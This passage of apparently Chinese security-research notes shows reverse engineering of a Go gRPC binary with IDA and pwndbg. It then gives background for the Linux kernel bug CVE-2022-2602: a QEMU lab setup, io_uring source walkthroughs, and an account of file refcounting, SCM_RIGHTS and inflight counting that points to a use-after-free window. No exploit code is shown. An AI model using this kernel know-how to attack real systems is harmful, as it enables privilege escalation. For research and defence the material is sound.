runtime__type_0 *v5; // [rsp-28h] [rbp-38h]
runtime_tmpBuf *v6; // [rsp-28h] [rbp-38h]
string v7; // [rsp-20h] [rbp-30h]
string v8; // [rsp-10h] [rbp-20h]
uint8 *str; // [rsp+0h] [rbp-10h]
void *retaddr; // [rsp+10h] [rbp+0h] BYREF
retval_7E3C40 result; // [rsp+38h] [rbp+28h]

if ( (unsigned int)&retaddr <= *(_QWORD *)(v3 + 16LL) )
runtime_morestack_noctxt();
v7.str = (uint8 *)runtime_newobject(v5);
str = runtime_concatstring2(v6, v7, v8).str;
*((_QWORD *)str + 6LL) = "Hello ";
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrier();
else
*((_QWORD *)str + 5LL) = v4;
return result;
}

但该函数并没有直接被其他函数调用,我们必须通过其他方法找到其调用链:

1
Down	j	.text:00000000007E3CF2	jmp     main__ptr_server_SayHello

有一个方法就是找到注册函数 s.RegisterService(在无符号的情况下也适用):

1
2
3
4
5
6
7
8
.text:00000000007E3D80 E8 DB 59 FE FF                call    google_golang_org_grpc_NewServer
.text:00000000007E3D80
.text:00000000007E3D85 48 89 44 24 28 mov [rsp+68h+var_40], rax
.text:00000000007E3D8A 90 nop
.text:00000000007E3D8B 48 8B 0D 36 AD 18 00 mov rcx, cs:off_96EAC8
.text:00000000007E3D92 48 8D 1D 47 D6 46 00 lea rbx, go_test_proto_Greeter_ServiceDesc
.text:00000000007E3D99 48 8D 3D 50 7A 4A 00 lea rdi, runtime_zerobase
.text:00000000007E3DA0 E8 7B 5F FE FF call google_golang_org_grpc__ptr_Server_RegisterService
  • rax 为 NewServer 的返回值
  • rbx 为 ServiceDesc 对象
  • rcx 为定义的 interface 接口

我们需要的信息就在第二个参数 ServiceDesc 对象中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// ServiceDesc describes one service: its name, the interface type used to
// check the implementation, its method and stream descriptors, and metadata.
type ServiceDesc struct {
ServiceName string
// The pointer to the service interface. Used to check whether the user
// provided implementation satisfies the interface requirements.
HandlerType any
Methods []MethodDesc
Streams []StreamDesc
Metadata any
}

// MethodDesc pairs a method name with the handler that serves it.
type MethodDesc struct {
MethodName string
Handler methodHandler
}

// StreamDesc pairs a stream name with its handler, plus two flags
// (presumably marking which side of the call streams).
type StreamDesc struct {
StreamName string
Handler StreamHandler

ServerStreams bool
ClientStreams bool
}
1
2
3
4
5
6
.data:0000000000C513E0                               public go_test_proto_Greeter_ServiceDesc
.data:0000000000C513E0 ; google_golang_org_grpc_ServiceDesc_0 go_test_proto_Greeter_ServiceDesc
.data:0000000000C513E0 9B EB 8C 00 00 00 00 00 13 00+go_test_proto_Greeter_ServiceDesc google_golang_org_grpc_ServiceDesc_0 <<offset aGreeterSrvGree, 13h>, <offset unk_80B520, 0>, <\
.data:0000000000C513E0 00 00 00 00 00 00 20 B5 80 00+ ; DATA XREF: main_main+92↑o
.data:0000000000C513E0 00 00 00 00 00 00 00 00 00 00+ offset off_C49860, 1, 1>, <offset regexp_arrayNoInts, 0, 0>, <\ ; "greeter.srv.Greeter" ...
.data:0000000000C513E0 00 00 60 98 C4 00 00 00 00 00+ offset unk_8221E0, offset off_C481A0>>
  • IDA 信息可能有点难看,这里直接看 GDB 调试信息(长度大小为 0x60)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pwndbg> telescope 0xc513e0
00:0000│ rbx 0xc513e0 —▸ 0x8cebfb ◂— 0x2e72657465657267 ('greeter.') /* ServiceName */
01:00080xc513e8 ◂— 0x13
02:00100xc513f0 —▸ 0x80b540 ◂— 0x8 /* HandlerType */
03:00180xc513f8 ◂— 0x0
04:00200xc51400 —▸ 0xc49860 —▸ 0x8c81dc ◂— 0x6f6c6c6548796153 ('SayHello') /* MethodDesc */
05:00280xc51408 ◂— 0x1
06:00300xc51410 ◂— 0x1
07:00380xc51418 —▸ 0xc8b4e0 ◂— 0x1010101010101 /* StreamDesc */
08:00400xc51420 ◂— 0x0
09:00480xc51428 ◂— 0x0
0a:00500xc51430 —▸ 0x822200 ◂— 0x10 /* Metadata */
0b:00580xc51438 —▸ 0xc481a0 —▸ 0x8cedd6 ◂— 0x72672f6f746f7270 ('proto/gr')
0c:00600xc51440 —▸ 0x8c4889 ◂— 0x6956696156435455 ('UTCVaiVi')
0d:00680xc51448 ◂— 0x3
1
2
3
4
5
6
pwndbg> telescope 0xc49860 /* MethodDesc */
00:00000xc49860 —▸ 0x8c81dc ◂— 0x6f6c6c6548796153 ('SayHello') /* MethodName */
01:00080xc49868 ◂— 0x8
02:00100xc49870 —▸ 0x900b28 —▸ 0x7e3860 ◂— cmp rsp, qword ptr [r14 + 10h] /* Handler */
03:00180xc49878 ◂— 0x0
... ↓ 4 skipped
  • 在 Handler 中可以找到目标函数

之前我们已经分析了存根文件中的 Handler 函数,但是在 IDA 逆向时发现其有很大不同:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
retval_7E3860 __golang go_test_proto__Greeter_SayHello_Handler(
interface__0 srv,
context_Context_0 ctx,
funcinterface__error dec,
google_golang_org_grpc_UnaryServerInterceptor interceptor)
{
retval_7E3A60 (__golang *v4)(context_Context_0, interface__0); // rax
retval_7E3A60 (__golang *v5)(context_Context_0, interface__0); // rbx
__int64 (**v6)(void); // rsi
void (*v7)(context_Context_0, interface__0, google_golang_org_grpc_UnaryServerInfo_0 *, google_golang_org_grpc_UnaryHandler, interface__0 *, error_0 *); // r8
int v8; // r14
retval_7E3A60 (__golang **v9)(context_Context_0, interface__0); // rax
retval_7E3A60 (__golang **v10)(context_Context_0, interface__0); // rax
int v11; // rax
runtime__type_0 *v12; // [rsp-30h] [rbp-50h]
runtime_interfacetype_0 *v13; // [rsp-30h] [rbp-50h]
runtime__type_0 *v14; // [rsp-30h] [rbp-50h]
runtime__type_0 *v15; // [rsp-28h] [rbp-48h]
retval_7E3A60 (__golang *v16)(context_Context_0, interface__0); // [rsp+10h] [rbp-10h]
void *retaddr; // [rsp+20h] [rbp+0h] BYREF
google_golang_org_grpc_UnaryServerInterceptor interceptora; // [rsp+50h] [rbp+30h]
retval_7E3860 result; // [rsp+58h] [rbp+38h]

if ( (unsigned int)&retaddr <= *(_QWORD *)(v8 + 16LL) )
runtime_morestack_noctxt();
interceptora = v7;
v16 = v4;
v15 = (runtime__type_0 *)runtime_newobject(v12);
if ( !(*v6)() )
{
if ( interceptora )
{
runtime_newobject(&v13->typ);
*v9 = v16;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrierDX();
else
v9[1LL] = v5;
v9[3LL] = (retval_7E3A60 (__golang *)(context_Context_0, interface__0))29LL;
v9[2LL] = (retval_7E3A60 (__golang *)(context_Context_0, interface__0))"/greeter.srv.Greeter/SayHello";
runtime_newobject(v14);
*v10 = go_test_proto__Greeter_SayHello_Handler_func1;
v10[1LL] = v16;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrierR9();
else
v10[2LL] = v5;
(*(void (**)(void))interceptora)(); /* 调用interceptor(注册的拦截器) */
}
else
{
runtime_assertE2I(v13, v15);
(*(void (**)(void))(v11 + 24LL))(); /* 调用目标函数 */
}
}
return result;
}
  • 通过调试即可找到目标函数的具体地址:
1
0x7e39ce    call   rdx                           <0x7e3c40> /* main__ptr_server_SayHello */

CVE-2022-2602

1
Linux version 5.13.1 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 11.4.0-2ubuntu1~20.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Wed Mar 13 11:24:24 CST 2024
1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot -s
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -t devpts devpts /dev/pts

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

io_uring 模块

io_uring 会把要内核做的 io 操作都放在一个队列里,内核空闲的时候就会从任务队列里拿你给它的 io 任务去完成,等你觉得内核做完了你给它的 io 任务的时候,你就去结果队列里取结果就行了

提交任务的环叫 SQ,里面的每个任务叫 SQE,获取结果的环叫 CQ,里面的每个结果叫 CQE

io_uring 的具体实现是通过下面三个系统调用:

  • io_uring_setup:初始化 io_uring
    • 初始化 io_uring 的两个环形队列(SQ,CQ)
    • 为 io_uring 创建一个文件对象(后续使用这个文件描述符映射出内存,来访问两个队列和创建相关资源)
  • io_uring_enter:通知内核任务已经提交或获取任务结果
    • 任务发送和结果接收需要使用 io_uring_enter
    • io_uring 提供了一个轮询模式 IORING_SETUP_SQPOLL,在该模式下,内核会自动去检查任务队列里是否有新任务并去完成,而不需要我们去调用 io_uring_enter 系统调用(底层使用了内核线程)
  • io_uring_register:注册共享缓冲区
    • 将文件描述符或内存区域与 io_uring 关联起来

安装 liburing 生成 liburing.a / liburing.so.2.2:

1
2
3
wget https://github.com/axboe/liburing/archive/liburing-2.2.zip
# Unpack the archive and build from inside the extracted source tree.
unzip liburing-2.2.zip
cd liburing-liburing-2.2
make
sudo make install

liburing 中会提供一些 io_uring API:

1
2
3
#include <liburing.h>

struct io_uring_sqe *io_uring_get_sqe(struct io_uring *ring);
  • 从属于 ring 参数的提交队列中获取下一个可用的提交队列条目
  • 成功时返回一个指向提交队列条目的指针,失败时返回 NULL
1
2
3
#include <liburing.h>

int io_uring_submit(struct io_uring *ring);
  • 将下一个事件提交到属于 ring 的提交队列
  • 成功时返回提交的提交队列条目数,失败时返回 -errno

调用者先使用 io_uring_get_sqe 检索提交队列条目,然后初始化 SQE(可以通过 API 辅助填写),最后使用 io_uring_submit 提交

用于提交请求的 io_uring_enter 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit, u32,
min_complete, u32, flags, const void __user *, argp, size_t,
argsz)
{

......

if (ctx->flags & IORING_SETUP_SQPOLL) {

......

} else if (to_submit) {
ret = io_uring_add_task_file(ctx);
if (unlikely(ret))
goto out;
mutex_lock(&ctx->uring_lock);
submitted = io_submit_sqes(ctx, to_submit); /* 核心函数 */
mutex_unlock(&ctx->uring_lock);

if (submitted != to_submit)
goto out;
}
if (flags & IORING_ENTER_GETEVENTS) {

......

}

out:
percpu_ref_put(&ctx->refs);
out_fput:
fdput(f);
return submitted ? submitted : ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
/*
 * io_submit_sqes() - take up to @nr entries from the submission queue and
 * submit each one.
 *
 * @nr is first clamped to the ring size and to the number of entries that
 * are actually queued. References for all @nr requests are taken up front
 * (ctx refs, the task's inflight counter, the task usage count); the ones
 * that end up unused are dropped again after the loop.
 *
 * Returns the number of entries counted as submitted, or -EAGAIN if the ctx
 * references could not be taken or the very first request allocation failed.
 */
static int io_submit_sqes(struct io_ring_ctx *ctx, unsigned int nr)
{
int submitted = 0;

/* make sure SQ entry isn't read before tail */
nr = min3(nr, ctx->sq_entries, io_sqring_entries(ctx));

if (!percpu_ref_tryget_many(&ctx->refs, nr))
return -EAGAIN;

percpu_counter_add(&current->io_uring->inflight, nr);
refcount_add(nr, &current->usage);
io_submit_state_start(&ctx->submit_state, nr);

while (submitted < nr) { /* handle every queued request */
const struct io_uring_sqe *sqe; /* one SQE (a submitted task) */
struct io_kiocb *req;

req = io_alloc_req(ctx);
if (unlikely(!req)) {
if (!submitted)
submitted = -EAGAIN;
break;
}
sqe = io_get_sqe(ctx); /* fetch the io_uring_sqe supplied by user space */
if (unlikely(!sqe)) {
kmem_cache_free(req_cachep, req);
break;
}
/* will complete beyond this point, count as submitted */
submitted++;
if (io_submit_sqe(ctx, req, sqe)) /* core function: processes the submitted task */
break;
}

if (unlikely(submitted != nr)) {
int ref_used = (submitted == -EAGAIN) ? 0 : submitted;
struct io_uring_task *tctx = current->io_uring;
int unused = nr - ref_used;

percpu_ref_put_many(&ctx->refs, unused);
percpu_counter_sub(&tctx->inflight, unused);
put_task_struct_many(current, unused);
}

io_submit_state_end(&ctx->submit_state, ctx);
/* Commit SQ ring head once we've consumed and submitted all SQEs */
io_commit_sqring(ctx);

return submitted;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
/*
 * io_submit_sqe() - initialise, prepare and queue one request built from @sqe.
 *
 * The request is initialised with io_init_req() and prepared with
 * io_req_prep(). If either step fails, the request is completed with that
 * error, and any link chain under construction is failed with -ECANCELED.
 * After that the request is appended to the current link chain, starts a
 * new chain, or is queued on its own.
 *
 * Returns 0 on success or the negative error from the failing step.
 */
static int io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req,
const struct io_uring_sqe *sqe)
{
/* the io_uring_sqe here was filled in and passed by user space */
struct io_submit_link *link = &ctx->submit_state.link;
int ret;

ret = io_init_req(ctx, req, sqe); /* initialise the request (copy the sqe's fields into req) */
if (unlikely(ret)) {
fail_req:
if (link->head) {
/* fail even hard links since we don't submit */
link->head->flags |= REQ_F_FAIL_LINK;
io_req_complete_failed(link->head, -ECANCELED);
link->head = NULL;
}
io_req_complete_failed(req, ret);
return ret;
}
ret = io_req_prep(req, sqe); /* prepare the request; per the article, file permission checks happen here */
if (unlikely(ret))
goto fail_req;

/* don't need @sqe from now on */
trace_io_uring_submit_sqe(ctx, req->opcode, req->user_data, true,
ctx->flags & IORING_SETUP_SQPOLL);

/*
* If we already have a head request, queue this one for async
* submittal once the head completes. If we don't have a head but
* IOSQE_IO_LINK is set in the sqe, start a new head. This one will be
* submitted sync once the chain is complete. If none of those
* conditions are true (normal request), then just queue it.
*/
if (link->head) {
struct io_kiocb *head = link->head;

/*
* Taking sequential execution of a link, draining both sides
* of the link also fullfils IOSQE_IO_DRAIN semantics for all
* requests in the link. So, it drains the head and the
* next after the link request. The last one is done via
* drain_next flag to persist the effect across calls.
*/
if (req->flags & REQ_F_IO_DRAIN) {
head->flags |= REQ_F_IO_DRAIN;
ctx->drain_next = 1;
}
ret = io_req_prep_async(req);
if (unlikely(ret))
goto fail_req;
trace_io_uring_link(ctx, req, head);
link->last->link = req;
link->last = req;

/* last request of a link, enqueue the link */
if (!(req->flags & (REQ_F_LINK | REQ_F_HARDLINK))) {
io_queue_sqe(head);
link->head = NULL;
}
} else {
if (unlikely(ctx->drain_next)) {
req->flags |= REQ_F_IO_DRAIN;
ctx->drain_next = 0;
}
if (req->flags & (REQ_F_LINK | REQ_F_HARDLINK)) {
link->head = req;
link->last = req;
} else {
io_queue_sqe(req); /* try to execute the request */
}
}

return 0;
}
  • 这里先检查了文件的权限,然后调用 io_queue_sqe 执行如下的调用链
1
io_queue_sqe->__io_queue_sqe->io_issue_sqe
  • 在 io_issue_sqe 中会根据 req->opcode 来调用不同的函数进行处理,在这些函数中可能会因为 inode 锁而陷入阻塞
  • 由于之前已经完成了权限检查,如果在阻塞时 file 结构体被非法释放,就可能存在 DirtyFile 的风险

初始化提交任务的 io_init_req 函数源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
/*
 * io_init_req() - fill in @req from the user-supplied @sqe.
 *
 * Copies opcode, flags and user_data out of the sqe, resets the remaining
 * request fields, validates flags, opcode, restrictions and buffer-select
 * support, resolves the optional personality to a credential, and looks up
 * the target file when the opcode needs one.
 *
 * Returns 0 on success; -EINVAL for invalid flags, an out-of-range opcode or
 * an unknown personality; -EACCES when the restriction check fails;
 * -EOPNOTSUPP when buffer select is requested for an opcode without support;
 * -EBADF when the file lookup fails.
 */
static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
const struct io_uring_sqe *sqe)
{
struct io_submit_state *state;
unsigned int sqe_flags;
int personality, ret = 0;

req->opcode = READ_ONCE(sqe->opcode);
/* same numerical values with corresponding REQ_F_*, safe to copy */
req->flags = sqe_flags = READ_ONCE(sqe->flags);
req->user_data = READ_ONCE(sqe->user_data);
req->async_data = NULL;
req->file = NULL;
req->ctx = ctx;
req->link = NULL;
req->fixed_rsrc_refs = NULL;
/* one is dropped after submission, the other at completion */
atomic_set(&req->refs, 2);
req->task = current;
req->result = 0;
req->work.creds = NULL;

/* enforce forwards compatibility on users */
if (unlikely(sqe_flags & ~SQE_VALID_FLAGS))
return -EINVAL;
if (unlikely(req->opcode >= IORING_OP_LAST))
return -EINVAL;
if (unlikely(!io_check_restriction(ctx, req, sqe_flags)))
return -EACCES;

if ((sqe_flags & IOSQE_BUFFER_SELECT) &&
!io_op_defs[req->opcode].buffer_select)
return -EOPNOTSUPP;

personality = READ_ONCE(sqe->personality);
if (personality) {
req->work.creds = xa_load(&ctx->personalities, personality);
if (!req->work.creds)
return -EINVAL;
get_cred(req->work.creds);
}
state = &ctx->submit_state;

/*
* Plug now if we have more than 1 IO left after this, and the target
* is potentially a read/write to block based storage.
*/
if (!state->plug_started && state->ios_left > 1 &&
io_op_defs[req->opcode].plug) {
blk_start_plug(&state->plug);
state->plug_started = true;
}

if (io_op_defs[req->opcode].needs_file) {
bool fixed = req->flags & REQ_F_FIXED_FILE; /* REQ_F_FIXED_FILE corresponds to the user-space IOSQE_FIXED_FILE flag: the file comes from the ctx's registered files */

req->file = io_file_get(state, req, READ_ONCE(sqe->fd), fixed);
if (unlikely(!req->file))
ret = -EBADF;
}

state->ios_left--;
return ret;
}
  • 当用户态传入 io_uring_sqe->flags = IOSQE_FIXED_FILE 时,此时的 io_uring_sqe->fd 不再是 io_uring 需要处理的文件描述符,而是代表了 skb->fp->fp 中对应文件描述符的下标
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/*
 * io_file_get() - resolve the struct file for a request.
 *
 * When @fixed is set, @fd is an index into ctx->file_table and must be below
 * ctx->nr_user_files. The stored slot value is split with FFS_MASK into the
 * file pointer and extra bits, which are shifted into req->flags.
 * Otherwise @fd is looked up through __io_file_get().
 *
 * Returns the file, or NULL if the fixed index is out of range or the lookup
 * finds nothing.
 */
static struct file *io_file_get(struct io_submit_state *state,
struct io_kiocb *req, int fd, bool fixed)
{
struct io_ring_ctx *ctx = req->ctx;
struct file *file;

if (fixed) {
unsigned long file_ptr;

if (unlikely((unsigned int)fd >= ctx->nr_user_files))
return NULL;
fd = array_index_nospec(fd, ctx->nr_user_files);
file_ptr = io_fixed_file_slot(&ctx->file_table, fd)->file_ptr; /* use the index to fetch the stored struct file address */
file = (struct file *)(file_ptr & FFS_MASK);
file_ptr &= ~FFS_MASK;
/* mask in overlapping REQ_F and FFS bits */
req->flags |= (file_ptr << REQ_F_ASYNC_READ_BIT);
io_req_set_rsrc_node(req);
} else {
trace_io_uring_file_get(ctx, fd);
file = __io_file_get(state, fd); /* per the article, __io_file_get calls fget(fd) to obtain the struct file */

/* we don't allow fixed io_uring files */
if (file && unlikely(file->f_op == &io_uring_fops))
io_req_track_inflight(req);
}

return file;
}

用于注册的 io_uring_register 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/*
 * io_uring_register syscall entry point.
 *
 * Looks up @fd, checks that it refers to an io_uring instance, runs pending
 * task work, and performs the registration @opcode under ctx->uring_lock
 * via __io_uring_register().
 *
 * Returns the result of __io_uring_register(), -EBADF if @fd is not an open
 * file, or -EOPNOTSUPP if it is not an io_uring file.
 */
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)
{
struct io_ring_ctx *ctx;
long ret = -EBADF;
struct fd f;

f = fdget(fd);
if (!f.file)
return -EBADF;

ret = -EOPNOTSUPP;
if (f.file->f_op != &io_uring_fops)
goto out_fput;

ctx = f.file->private_data;

io_run_task_work();

mutex_lock(&ctx->uring_lock);
ret = __io_uring_register(ctx, opcode, arg, nr_args); /* core function */
mutex_unlock(&ctx->uring_lock);
trace_io_uring_register(ctx, opcode, ctx->nr_user_files, ctx->nr_user_bufs,
ctx->cq_ev_fd != NULL, ret);
out_fput:
fdput(f);
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

......

case IORING_REGISTER_FILES:
ret = io_sqe_files_register(ctx, arg, nr_args, NULL); /* 核心函数 */
break;

......

if (io_register_op_must_quiesce(opcode)) {
/* bring the ctx back to life */
percpu_ref_reinit(&ctx->refs);
reinit_completion(&ctx->ref_comp);
}
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
static int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
unsigned nr_args, u64 __user *tags)
{
__s32 __user *fds = (__s32 __user *) arg;
struct file *file;
int fd, ret;
unsigned i;
struct io_rsrc_data *file_data;

if (ctx->file_data)
return -EBUSY;
if (!nr_args)
return -EINVAL;
if (nr_args > IORING_MAX_FIXED_FILES)
return -EMFILE;
ret = io_rsrc_node_switch_start(ctx);
if (ret)
return ret;

file_data = io_rsrc_data_alloc(ctx, io_rsrc_file_put, nr_args);
if (!file_data)
return -ENOMEM;
ctx->file_data = file_data;
ret = -ENOMEM;
if (!io_alloc_file_tables(&ctx->file_table, nr_args))
goto out_free;

for (i = 0; i < nr_args; i++, ctx->nr_user_files++) {
/* 遍历所有用户传进来的文件描述符 */
u64 tag = 0;

if ((tags && copy_from_user(&tag, &tags[i], sizeof(tag))) ||
copy_from_user(&fd, &fds[i], sizeof(fd))) { /* 获取用户传递的文件描述符fd */
ret = -EFAULT;
goto out_fput;
}
/* allow sparse sets */
if (fd == -1) {
ret = -EINVAL;
if (unlikely(tag))
goto out_fput;
continue;
}

file = fget(fd); /* 获取文件结构体,fget会对文件引用次数+1 */
ret = -EBADF;
if (unlikely(!file))
goto out_fput;

/*
* Don't allow io_uring instances to be registered. If UNIX
* isn't enabled, then this causes a reference cycle and this
* instance can never get freed. If UNIX is enabled we'll
* handle it just fine, but there's still no point in allowing
* a ring fd as it doesn't support regular read/write anyway.
*/
if (file->f_op == &io_uring_fops) {
fput(file);
goto out_fput;
}
ctx->file_data->tags[i] = tag;
io_fixed_file_set(io_fixed_file_slot(&ctx->file_table, i), file);
}

ret = io_sqe_files_scm(ctx); /* 核心函数 */

......

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
 * Hand all registered files to __io_sqe_files_scm() in batches of at most
 * SCM_MAX_FD entries.
 * Returns 0 on success. If a batch fails, fput() is called on every file from
 * the failing offset onwards and the error is returned.
 */
static int io_sqe_files_scm(struct io_ring_ctx *ctx)
{
unsigned left, total;
int ret = 0;

total = 0;
left = ctx->nr_user_files;
while (left) { /* walk all registered files, one batch per iteration */
unsigned this_files = min_t(unsigned, left, SCM_MAX_FD);

ret = __io_sqe_files_scm(ctx, this_files, total); /* builds the skb for this batch */
if (ret)
break;
left -= this_files;
total += this_files;
}

if (!ret)
return 0;

/* error path: drop the files that were not handed over */
while (total < ctx->nr_user_files) {
struct file *file = io_file_from_index(ctx, total);

if (file)
fput(file);
total++;
}

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
 * Attach `nr` registered files, starting at table index `offset`, to a new
 * skb and queue that skb on the ring socket's receive queue.
 * Empty table slots are skipped; if none of the slots holds a file, the skb
 * and the fp list are freed again.
 * Returns 0 on success or -ENOMEM if an allocation fails.
 */
static int __io_sqe_files_scm(struct io_ring_ctx *ctx, int nr, int offset)
{
struct sock *sk = ctx->ring_sock->sk;
struct scm_fp_list *fpl;
struct sk_buff *skb;
int i, nr_files;

fpl = kzalloc(sizeof(*fpl), GFP_KERNEL);
if (!fpl)
return -ENOMEM;

skb = alloc_skb(0, GFP_KERNEL); /* allocate an sk_buff with a zero-size data area */
if (!skb) {
kfree(fpl);
return -ENOMEM;
}

skb->sk = sk;

nr_files = 0;
fpl->user = get_uid(current_user());
for (i = 0; i < nr; i++) { /* walk the files of this batch */
struct file *file = io_file_from_index(ctx, i + offset); /* fetch the struct file for this slot */

if (!file)
continue;
fpl->fp[nr_files] = get_file(file); /* take another reference on the file and record it in fpl */
unix_inflight(fpl->user, fpl->fp[nr_files]); /* account the file as in flight (bumps the inflight count for socket-backed files) */
nr_files++;
}

if (nr_files) {
fpl->max = SCM_MAX_FD;
fpl->count = nr_files;
UNIXCB(skb).fp = fpl; /* the skb now carries every file of this batch in fpl->fp[] */
skb->destructor = unix_destruct_scm;
refcount_add(skb->truesize, &sk->sk_wmem_alloc);
skb_queue_head(&sk->sk_receive_queue, skb); /* queue the skb on the io_uring socket's receive queue */

for (i = 0; i < nr_files; i++)
fput(fpl->fp[i]); /* fput() each file once, balancing the get_file() above */
} else {
kfree_skb(skb);
kfree(fpl);
}

return 0;
}
  • 用户传入的文件描述符都会保存在 skb->fp->fp 中,如果目标 skb 被销毁,则存储在 skb->fp->fp 中所有的 file 结构体都会被执行 fput 操作
  • sk_receive_queue 代表一个 socket 还未接收的消息队列

引用计数与飞行计数

在 linux 中 file 结构体用于描述一个打开的文件,其中的 file->f_count 成员用于记录其引用数目

  • 可能存在多个文件描述符对应同一个 file 结构体的情况(多个进程打开同一个文件,或者使用 dup() 函数拷贝文件描述符)
  • 函数 open dup fork 会使 file->f_count 增加,函数 close exit 会使 file->f_count 减小,当 file->f_count 为“0”时则释放 file 结构体

实际能引起文件引用计数变化的内核函数有:

  • fget():通过文件描述符获取 struct file,并把文件引用计数 +1
  • get_file():传入是 struct file,返回 struct file,该函数单纯的把文件引用计数 +1
  • fput():减少一次文件引用计数,如果减少到 0 则会释放文件的 struct file 结构

SCM_RIGHTS 消息拥有传递文件描述符信息的能力,linux 内核可以通过 sendmsg 系统调用来传递 SCM_RIGHTS 消息,也就是在两个不相关的进程间传递文件描述符信息

  • 该功能的本意是有权限打开文件的进程打开文件,然后传递给没权限打开的进程使用
  • 当 sender 进程将文件描述符传递给另一个 receiver 进程时,SCM_RIGHTS 将创建一个对 file 结构的引用
  • 当 receiver 进程确定接收到文件描述符时,SCM_RIGHTS 创建的引用将会被消除

使用 SCM_RIGHTS 可能会造成内存泄露问题:

1
2
3
4
5
(1)该进程创建socket A 和 B		  (fileA->f_count=1, fileB->f_count=1)
(2)将socket A 发送到 socket B (fileA->f_count=2, fileB->f_count=1)
(3)将socket B 发送到 socket A (fileA->f_count=2, fileB->f_count=2)
(4)关闭socket A (fileA->f_count=1, fileB->f_count=2)
(5)关闭socket B (fileA->f_count=1, fileB->f_count=1)
  • 由于 socket A 和 socket B 互相发给彼此的 SCM_RIGHTS 消息并没有被接收,导致 fileA->f_count 和 fileB->f_count 都为“1”,并且没有办法将其释放掉

函数 unix_inflight 用于增加飞行计数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 * Account `fp` as "in flight" on behalf of `user`.
 * If unix_get_socket() finds a socket behind `fp`, that socket's inflight
 * counter and the global unix_tot_inflight are incremented, and the socket is
 * added to gc_inflight_list when its counter goes from 0 to 1.
 * user->unix_inflight is incremented for every file, socket or not.
 * All updates happen under unix_gc_lock.
 */
void unix_inflight(struct user_struct *user, struct file *fp)
{
struct sock *s = unix_get_socket(fp); /* per the article, only socket and io_uring files yield a sock here */

spin_lock(&unix_gc_lock);

if (s) { /* socket-backed file: bump its inflight count */
struct unix_sock *u = unix_sk(s);

if (atomic_long_inc_return(&u->inflight) == 1) {
BUG_ON(!list_empty(&u->link));
list_add_tail(&u->link, &gc_inflight_list); /* first in-flight reference: add to the global inflight list */
} else {
BUG_ON(list_empty(&u->link));
}
unix_tot_inflight++; /* global count of in-flight sockets */
}
user->unix_inflight++; /* per-user count of in-flight files */
spin_unlock(&unix_gc_lock);
}

内核垃圾回收系统

Linux 内核垃圾回收系统就是为了防止这种情况下的内存耗尽,引入 inflight 飞行计数是为了识别潜在的垃圾

  • 当采用 SCM_RIGHTS 数据报发送文件描述符时,Linux 内核将其 unix_sock 放入全局列表 gc_inflight_list 中,并递增 unix_tot_inflight(表示飞行中的 socket 总数)
